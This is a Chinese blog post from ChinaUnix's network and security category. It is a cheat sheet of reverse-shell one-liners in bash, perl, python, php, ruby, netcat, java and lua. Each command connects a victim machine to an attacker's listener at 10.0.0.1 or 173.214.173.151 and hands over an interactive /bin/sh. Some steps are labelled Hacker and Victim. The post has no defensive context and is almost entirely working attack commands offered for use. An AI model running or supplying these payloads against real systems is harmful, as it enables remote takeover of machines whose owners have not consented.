Chinaunix首页 | 论坛 | 博客
  • 博客访问: 7598765
  • 博文数量: 1768
  • 博客积分: 18684
  • 博客等级: 上将
  • 技术积分: 16342
  • 用 户 组: 普通用户
  • 注册时间: 2010-06-02 10:28
个人简介

啥也没写

文章分类

全部博文(1768)

文章存档

2024年(14)

2023年(44)

2022年(39)

2021年(46)

2020年(43)

2019年(27)

2018年(44)

2017年(50)

2016年(47)

2015年(15)

2014年(21)

2013年(43)

2012年(143)

2011年(228)

2010年(263)

2009年(384)

2008年(246)

2007年(30)

2006年(38)

2005年(2)

2004年(1)

分类: 网络与安全

2016-12-15 11:09:58

bash版本:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
注意这个是由解析shell的bash完成,所以某些情况下不支持
perl版本:
perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
python版本:
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’
php版本:
php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’
ruby版本:
ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1″,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
nc版本:
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999
java版本
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
lua版本:
lua -e “require(’socket’);require(‘os’);t=socket.tcp();t:connect(‘10.0.0.1′,’1234′);os.execute(‘/bin/sh -i <&3 >&3 2>&3′);”
nc不使用-e:
 
Hacker:nc -lvnp listenport
 
Victim:mknod /tmp/backpipe p
 
Victim:/bin/sh 0/tmp/backpipe
 
不使用nc
 
Method 1:
 
Hacker: nc -nvlpp 8080
 
Victim: /bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1
 
Method 2:
 
Hacker: nc -nvlpp8080
 
Victim: mknod backpipe p && telnet 173.214.173.151 8080 0backpipe
 
Method 3:
 
Hacker: nc -nvlpp8080
 
Hacker: nc -nvlpp8888
 
Victim: telnet 173.214.173.151 8080 | /bin/bash | telnet 173.214.173.151 8888
参考文章:
 
 
阅读(12891) | 评论(0) | 转发(0) |
0

上一篇:kafka入门教程

下一篇:nginx csrf

给主人留下些什么吧!~~